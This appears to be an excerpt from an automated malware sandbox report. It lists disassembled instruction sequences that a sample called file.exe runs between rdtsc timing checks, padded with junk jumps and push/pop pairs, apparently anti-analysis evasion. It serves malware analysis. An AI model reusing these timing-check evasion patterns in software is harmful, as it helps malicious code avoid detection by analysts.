Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C44A second address: A9C49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F44646ECA46h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jno 00007F44646ECA46h 0x00000015 popad 0x00000016 pop ebx 0x00000017 push edx 0x00000018 pushad 0x00000019 jp 00007F44646ECA46h 0x0000001f jmp 00007F44646ECA57h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push edi 0x00000028 jmp 00007F44646ECA55h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F830 second address: A9F84A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82AC second address: AA82B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82B0 second address: AA82CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4465131BD7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82CD second address: AA82D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA82D7 second address: AA82DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF9A0 second address: AAF9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF9A4 second address: AAF9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF9A8 second address: AAFA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F44646ECA52h 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F44646ECA4Fh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F44646ECA4Fh 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F44646ECA4Fh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F44646ECA4Eh 0x0000002e jmp 00007F44646ECA4Ch 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAFA16 second address: AAFA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF84C second address: AAF860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF860 second address: AAF866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76C8 second address: AB76CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76CF second address: AB76D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76D5 second address: AB76DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB76DE second address: AB76E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB79CD second address: AB79F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F44646ECA54h 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7B47 second address: AB7B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7CC3 second address: AB7CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7CCD second address: AB7CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F29 second address: AB7F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F2F second address: AB7F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F38 second address: AB7F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F3E second address: AB7F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4465131BCCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7F50 second address: AB7F5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007F44646ECA46h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB840 second address: ABB865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jp 00007F4465131BE0h 0x0000000f jmp 00007F4465131BD4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABB865 second address: ABB874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F44646ECA46h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA07 second address: ABBA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4465131BCBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA16 second address: ABBA39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F44646ECA57h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA39 second address: ABBA56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBA56 second address: ABBA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4977 second address: AC49A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD7h 0x00000007 ja 00007F4465131BC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F4465131BCDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC49A5 second address: AC49BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA54h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADB763 second address: ADB769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF16F3 second address: AF172A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F44646ECA4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F44646ECA58h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F44646ECA46h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF172A second address: AF172E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF04BF second address: AF04C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF04C5 second address: AF04CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0ABE second address: AF0ACA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F44646ECA46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0ACA second address: AF0ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0DC2 second address: AF0DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F44646ECA4Ch 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnp 00007F44646ECA46h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0DE3 second address: AF0DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF0DE9 second address: AF0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF105A second address: AF1060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF11CD second address: AF1203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F44646ECA57h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F44646ECA53h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF1203 second address: AF1207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF1207 second address: AF120D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF43F1 second address: AF441E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4465131BD9h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF441E second address: AF4428 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F44646ECA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5A2F second address: AF5A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF5A37 second address: AF5A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5020A second address: 4B50231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4465131BD5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50231 second address: 4B5024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5024B second address: 4B5026E instructions: 0x00000000 rdtsc 0x00000002 mov bh, 52h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F4465131BD2h 0x0000000b mov edx, ecx 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5026E second address: 4B50284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502D9 second address: 4B502E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502E5 second address: 4B502EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 04EAFDFAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502EF second address: 4B502F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50369 second address: 4B50378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50378 second address: 4B503B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 355B3BCAh 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e jmp 00007F4465131BCAh 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F4465131BCCh 0x0000001f sub cx, AAB8h 0x00000024 jmp 00007F4465131BCBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50475 second address: 4B5048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5048D second address: 4B50491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50491 second address: 4B504F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3A447016h 0x0000000f jmp 00007F44646ECA57h 0x00000014 call 00007F44D5110581h 0x00000019 push 755727D0h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov eax, dword ptr [esp+10h] 0x00000029 mov dword ptr [esp+10h], ebp 0x0000002d lea ebp, dword ptr [esp+10h] 0x00000031 sub esp, eax 0x00000033 push ebx 0x00000034 push esi 0x00000035 push edi 0x00000036 mov eax, dword ptr [75600140h] 0x0000003b xor dword ptr [ebp-04h], eax 0x0000003e xor eax, ebp 0x00000040 push eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 push dword ptr [ebp-08h] 0x00000047 mov eax, dword ptr [ebp-04h] 0x0000004a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000051 mov dword ptr [ebp-08h], eax 0x00000054 lea eax, dword ptr [ebp-10h] 0x00000057 mov dword ptr fs:[00000000h], eax 0x0000005d ret 0x0000005e jmp 00007F44646ECA56h 0x00000063 and dword ptr [ebp-04h], 00000000h 0x00000067 jmp 00007F44646ECA50h 0x0000006c mov edx, dword ptr [ebp+0Ch] 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 mov ecx, ebx 0x00000074 pushad 0x00000075 popad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B504F1 second address: 4B5052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4465131BCEh 0x00000012 xor cx, 1748h 0x00000017 jmp 00007F4465131BCBh 0x0000001c popfd 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5052F second address: 4B505DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA54h 0x00000009 popad 0x0000000a popad 0x0000000b mov al, byte ptr [edx] 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 mov edi, 29F7A23Eh 0x00000016 popad 0x00000017 inc edx 0x00000018 jmp 00007F44646ECA55h 0x0000001d test al, al 0x0000001f pushad 0x00000020 call 00007F44646ECA4Ch 0x00000025 pushfd 0x00000026 jmp 00007F44646ECA52h 0x0000002b jmp 00007F44646ECA55h 0x00000030 popfd 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007F44646ECA57h 0x0000003a adc ecx, 77AA925Eh 0x00000040 jmp 00007F44646ECA59h 0x00000045 popfd 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B505DE second address: 4B505DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 21A28327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F4465131B21h 0x00000010 mov al, byte ptr [edx] 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 mov edi, 29F7A23Eh 0x0000001b popad 0x0000001c inc edx 0x0000001d jmp 00007F4465131BD5h 0x00000022 test al, al 0x00000024 pushad 0x00000025 call 00007F4465131BCCh 0x0000002a pushfd 0x0000002b jmp 00007F4465131BD2h 0x00000030 jmp 00007F4465131BD5h 0x00000035 popfd 0x00000036 pop esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushfd 0x0000003a jmp 00007F4465131BD7h 0x0000003f adc ecx, 77AA925Eh 0x00000045 jmp 00007F4465131BD9h 0x0000004a popfd 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50600 second address: 4B50604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50604 second address: 4B5060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5060A second address: 4B5064E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c jmp 00007F44646ECA4Eh 0x00000011 dec edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA57h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5064E second address: 4B506D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4465131BD2h 0x00000009 or cx, F578h 0x0000000e jmp 00007F4465131BCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea ebx, dword ptr [edi+01h] 0x0000001a jmp 00007F4465131BD6h 0x0000001f mov al, byte ptr [edi+01h] 0x00000022 pushad 0x00000023 mov bx, ax 0x00000026 push esi 0x00000027 mov dx, CD1Ch 0x0000002b pop edi 0x0000002c popad 0x0000002d inc edi 0x0000002e jmp 00007F4465131BD0h 0x00000033 test al, al 0x00000035 jmp 00007F4465131BD0h 0x0000003a jne 00007F44D5B49F83h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F4465131BCAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506D6 second address: 4B506E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506E5 second address: 4B506EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506EB second address: 4B506EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506EF second address: 4B50757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, edx 0x0000000d jmp 00007F4465131BD6h 0x00000012 shr ecx, 02h 0x00000015 pushad 0x00000016 jmp 00007F4465131BCEh 0x0000001b pushfd 0x0000001c jmp 00007F4465131BD2h 0x00000021 sub al, FFFFFF88h 0x00000024 jmp 00007F4465131BCBh 0x00000029 popfd 0x0000002a popad 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f rep movsd 0x00000031 rep movsd 0x00000033 rep movsd 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push edx 0x00000039 pop esi 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50757 second address: 4B50774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50774 second address: 4B507B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a pushad 0x0000000b jmp 00007F4465131BD3h 0x00000010 jmp 00007F4465131BD8h 0x00000015 popad 0x00000016 and ecx, 03h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507B4 second address: 4B507B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507B8 second address: 4B507BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507BC second address: 4B507C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B507C2 second address: 4B508B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsb 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4465131BCCh 0x00000013 sbb ah, 00000038h 0x00000016 jmp 00007F4465131BCBh 0x0000001b popfd 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F4465131BD6h 0x00000025 xor esi, 7FC66798h 0x0000002b jmp 00007F4465131BCBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000039 jmp 00007F4465131BD6h 0x0000003e mov eax, ebx 0x00000040 jmp 00007F4465131BD0h 0x00000045 mov ecx, dword ptr [ebp-10h] 0x00000048 pushad 0x00000049 push eax 0x0000004a mov cx, di 0x0000004d pop edx 0x0000004e popad 0x0000004f mov dword ptr fs:[00000000h], ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F4465131BCCh 0x0000005f jmp 00007F4465131BD5h 0x00000064 popfd 0x00000065 pushfd 0x00000066 jmp 00007F4465131BD0h 0x0000006b adc esi, 46DC7DE8h 0x00000071 jmp 00007F4465131BCBh 0x00000076 popfd 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508B1 second address: 4B508B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508B7 second address: 4B508BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
